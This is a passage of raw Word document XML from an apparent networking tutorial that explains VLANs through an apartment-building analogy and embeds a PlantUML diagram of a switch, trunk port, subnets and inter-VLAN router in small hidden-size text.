          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>loors</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:t>: Different VLANs (isolated living spaces)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6312E29B" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Elevators</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:t>: Trunk ports (connections between floors/switches)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668C5063" w14:textId="7585A817" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Floor </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ccess </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ards</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:t>: VLAN membership (authorized access only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF4DE60" w14:textId="2C70ACBB" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Building </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>anager</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:t>: Network administrator (controls access and assignments)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6003DEBE" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00C636B7">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00382FFA">
        <w:t xml:space="preserve">Just as residents on different floors cannot directly visit each other without using elevators and proper access, </w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>devices in different VLANs cannot communicate without going through inter-VLAN routing</w:t>
      </w:r>
      <w:r w:rsidRPr="00382F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6"/>
        <w:gridCol w:w="450"/>
      </w:tblGrid>
      <w:tr w:rsidR="00382FFA" w14:paraId="1C85263B" w14:textId="77777777" w:rsidTr="0052487A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17046" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="756B7A08" w14:textId="21DB2682" w:rsidR="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="001A24D9" wp14:editId="7A1F67B9">
                  <wp:extent cx="10972800" cy="4606925"/>
                  <wp:effectExtent l="0" t="0" r="0" b="3175"/>
                  <wp:docPr id="1235929324"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0" cy="4606925"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B025118" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>@startuml</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52EDE7F3" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>title VLAN Network Architecture</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BE83437" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6627DAC6" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>package "Physical Switch Infrastructure" {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2200D1FF" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Layer 2 Switch" as switch #lightblue {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1484E4FA" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "VLAN 10\nSales Department" as vlan10 #lightgreen</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49510D48" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "VLAN 20\nEngineering Department" as vlan20 #lightyellow</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4577616B" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "VLAN 30\nManagement" as vlan30 #lightpink</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FE10CAE" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "VLAN 99\nNetwork Management" as vlan99 #lightgray</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47B03BA3" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EECC08B" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6BA376A6" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Physical Ports" as ports #lightcyan {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="790BBC8E" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "Fa0/1-8\nAccess Ports" as access_ports</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="524D9656" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "Gi0/1\nTrunk Port" as trunk_port</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="058D39BD" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15ECA8A2" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="330DFF55" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Connected Devices" as devices {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B09275C" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "Sales PCs\n192.168.10.x" as sales_devices #lightgreen</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6937D933" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "Engineering Workstations\n192.168.20.x" as eng_devices #lightyellow</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E945F22" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "Management Laptops\n192.168.30.x" as mgmt_devices #lightpink</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D125A84" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04275884" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="747B7C44" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="405B455F" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>rectangle "Layer 3 Router" as router #lightcoral {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08813358" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Subinterface 10\n192.168.10.1/24" as sub10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F9B64AC" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Subinterface 20\n192.168.20.1/24" as sub20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6772130B" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Subinterface 30\n192.168.30.1/24" as sub30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E5170CE" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35614037" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6EE94C5A" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>vlan10 --&gt; access_ports : Ports 1-3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="072318C0" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>vlan20 --&gt; access_ports : Ports 4-6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6879418F" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>vlan30 --&gt; access_ports : Ports 7-8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ED4F38D" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>vlan99 --&gt; trunk_port : Management VLAN</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A903194" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="28CACDF0" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>access_ports --&gt; sales_devices : VLAN 10 Assignment</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="074B3B7F" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>access_ports --&gt; eng_devices : VLAN 20 Assignment</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C36194D" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>access_ports --&gt; mgmt_devices : VLAN 30 Assignment</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72759894" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="246B5E7A" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>trunk_port --&gt; router : 802.1Q Tagged Traffic</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="461439C6" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>router --&gt; sub10 : VLAN 10 Gateway</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10F93766" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>router --&gt; sub20 : VLAN 20 Gateway</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43CF0F0F" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>router --&gt; sub30 : VLAN 30 Gateway</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79818577" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="78EA3052" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right of vlan10 : Isolated broadcast domain\nfor Sales department</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B4CB100" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right of vlan20 : Separate network segment\nfor Engineering</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="582F268A" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right of trunk_port : Carries multiple VLANs\nwith 802.1Q tags</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23E6584C" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right of router : Inter-VLAN routing\nenables cross-VLAN communication</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37358D94" w14:textId="56D61F1E" w:rsidR="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:r w:rsidRPr="00382FFA">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>@enduml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00382FFA" w14:paraId="55E26DBF" w14:textId="77777777" w:rsidTr="0052487A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17046" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01D4B366" w14:textId="37F86A1A" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00382FFA">
